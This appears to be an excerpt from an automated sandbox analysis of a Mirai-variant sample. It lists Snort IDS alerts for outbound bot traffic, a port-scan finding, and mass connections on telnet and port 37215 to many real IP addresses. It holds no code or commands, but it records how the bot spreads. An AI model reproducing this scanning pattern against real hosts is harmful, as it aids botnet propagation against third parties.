Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:52208 -> 95.110.208.137:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51872 -> 95.216.123.182:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:53598 -> 95.0.98.88:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59914 -> 95.143.149.193:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:42706 -> 95.216.127.249:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51042 -> 88.216.129.122:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:55164 -> 88.221.226.64:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:50630 -> 88.63.12.223:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:37116 -> 88.96.62.214:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51888 -> 88.221.100.248:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51742 -> 112.13.121.101:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:52590 -> 112.171.68.227:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51690 -> 112.13.121.101:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:57990 -> 112.124.32.56:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51556 -> 88.99.36.119:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:50708 -> 95.128.42.202:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:60210 -> 95.67.8.239:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:55822 -> 95.56.20.15:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39936 -> 95.181.228.164:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:42514 -> 88.221.230.144:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:42840 -> 88.147.150.44:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:32960 -> 112.213.32.238:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:44188 -> 112.85.242.201:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:44192 -> 112.85.242.201:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:49376 -> 95.170.92.20:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:38158 -> 95.101.203.250:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:54212 -> 95.142.35.91:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:42402 -> 112.168.163.80:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:33838 -> 112.90.88.90:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:38656 -> 95.179.193.100:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:54004 -> 95.164.1.126:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:34276 -> 95.142.121.34:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:35120 -> 95.110.177.150:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:35480 -> 95.68.75.49:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59206 -> 95.68.11.200:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:47802 -> 112.185.157.90:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:55122 -> 95.211.60.130:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59074 -> 95.101.241.12:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:46436 -> 95.101.78.69:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:58040 -> 95.216.30.50:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:52326 -> 95.153.45.136:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:34114 -> 95.79.100.40:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:56872 -> 95.86.102.40:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39940 -> 112.83.37.177:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:38792 -> 88.221.105.185:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:41816 -> 88.28.177.64:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:37846 -> 88.212.218.18:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:50440 -> 88.84.219.103:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:53080 -> 95.138.144.217:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:43940 -> 95.111.242.79:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:58672 -> 95.216.41.52:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:60290 -> 95.158.24.64:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:43390 -> 95.163.217.73:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:47848 -> 95.165.230.10:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:60954 -> 88.174.163.106:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39818 -> 88.99.97.116:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:56122 -> 95.181.129.220:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:44304 -> 88.249.66.46:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:53612 -> 88.221.34.18:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:56312 -> 95.101.214.35:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:33398 -> 95.100.231.123:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:42386 -> 95.100.226.52:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59204 -> 95.68.46.234:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:49862 -> 95.58.114.139:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51832 -> 95.217.161.169:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:42310 -> 95.101.41.168:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:48976 -> 95.101.14.37:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39258 -> 95.78.232.113:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:47552 -> 95.86.82.1:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39562 -> 95.58.54.92:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:52636 -> 88.221.127.197:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:53670 -> 88.221.4.176:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:42472 -> 88.218.138.42:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:34420 -> 88.198.144.142:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:60588 -> 112.121.179.134:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:36432 -> 95.216.6.26:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39662 -> 95.86.112.120:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:36206 -> 88.99.168.212:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:44240 -> 88.198.38.79:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:57328 -> 95.101.253.210:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:56082 -> 95.100.75.213:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:49146 -> 95.100.100.70:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:34884 -> 95.169.26.226:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:38118 -> 95.216.175.59:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:55242 -> 95.59.106.192:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59956 -> 112.167.244.204:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:45418 -> 112.83.36.62:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:45420 -> 112.83.36.62:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:56100 -> 95.101.149.149:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:35644 -> 95.174.28.164:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:57652 -> 95.217.183.141:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:54374 -> 95.163.53.162:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:55098 -> 95.134.64.163:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:55042 -> 95.86.111.177:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:46630 -> 95.84.249.57:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:37194 -> 112.165.98.59:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39634 -> 95.170.66.222:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59490 -> 95.216.154.226:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:35044 -> 95.101.88.186:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59690 -> 95.100.205.132:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:45826 -> 95.167.23.17:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39656 -> 95.7.114.103:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:52232 -> 88.221.37.31:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59722 -> 95.179.146.203:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:33966 -> 95.244.58.83:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:41208 -> 95.217.237.36:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:47876 -> 95.100.179.114:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:52832 -> 95.86.81.60:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:38848 -> 95.59.243.129:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51628 -> 95.101.175.213:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:42972 -> 95.216.115.168:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:36270 -> 95.85.210.224:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:43754 -> 95.216.124.146:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:47620 -> 95.57.101.214:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51674 -> 95.101.175.213:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:47714 -> 95.100.245.131:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:36494 -> 95.101.203.212:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:32844 -> 95.85.26.17:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39556 -> 95.143.181.98:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39368 -> 95.81.32.41:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:34720 -> 95.215.140.7:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:44980 -> 95.100.205.6:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:46230 -> 95.181.231.226:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:46354 -> 95.164.62.167:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:33940 -> 95.79.31.246:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59690 -> 112.186.20.38:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:38722 -> 95.43.238.159:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:41012 -> 112.186.69.72:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59798 -> 112.186.20.38:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:58512 -> 95.100.66.166:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:53772 -> 95.211.212.40:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39508 -> 95.100.185.228:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:44636 -> 95.217.7.135:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39406 -> 95.100.191.242:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:50536 -> 95.42.29.201:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:36698 -> 95.164.22.10:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51396 -> 95.86.125.199:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:38812 -> 95.58.72.215:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:54648 -> 112.25.57.43:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:54646 -> 112.25.57.43:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:60010 -> 112.186.20.38:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:56418 -> 112.127.183.253:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:46424 -> 112.90.95.73:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:46160 -> 95.101.220.172:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:33254 -> 95.42.211.55:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:43078 -> 95.237.209.81:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59996 -> 112.158.120.208:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:36532 -> 95.141.251.249:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:48634 -> 88.221.180.119:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:52440 -> 112.126.92.47:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:37016 -> 95.169.188.17:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:56420 -> 95.101.70.23:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:43462 -> 95.216.208.204:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:36554 -> 95.240.204.194:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:52622 -> 95.170.82.199:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:52880 -> 95.217.16.101:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:38446 -> 95.83.127.154:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:56520 -> 112.74.127.163:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:49512 -> 88.212.252.120:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:57584 -> 95.46.0.156:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59908 -> 88.212.8.12:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:37162 -> 95.100.190.36:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:49860 -> 95.100.149.42:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:36028 -> 95.214.235.221:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:56622 -> 112.187.12.111:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:56688 -> 95.59.137.3:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51742 -> 95.58.194.58:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59198 -> 95.168.78.3:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:50632 -> 95.0.142.188:80

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 197.160.52.247 ports 1,2,3,5,2323,7

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 43690
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 43708
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 43710
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 43714
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 43722
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 43726
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 43732
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 43736
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 43740
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 43758
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51112
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51244
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51256
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51278
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51232
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51284
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51414
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51418
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51350
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51466
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51418
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51490
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51534
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51484
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51596
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51626
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51650
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51716
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51740
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51748
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51770
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 58168
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 58204
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 58220
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 58236
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 58240
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 58256
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 58302
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 58312
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 58312
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 58330
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 58384

Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.255.59.61:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.155.118.60:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.140.93.193:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.94.36.228:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.240.169.137:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.156.75.239:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.232.233.5:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.244.118.41:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.27.205.153:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.23.216.221:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.117.216.223:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.9.175.108:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.11.210.121:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.190.121.11:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.123.46.241:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.146.53.46:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.245.73.238:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.54.220.233:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.224.124.198:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.247.131.106:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.51.193.179:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.185.2.78:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.39.182.12:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.86.193.36:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.100.199.92:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.242.100.146:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.240.50.107:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.253.178.177:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.163.48.77:37215
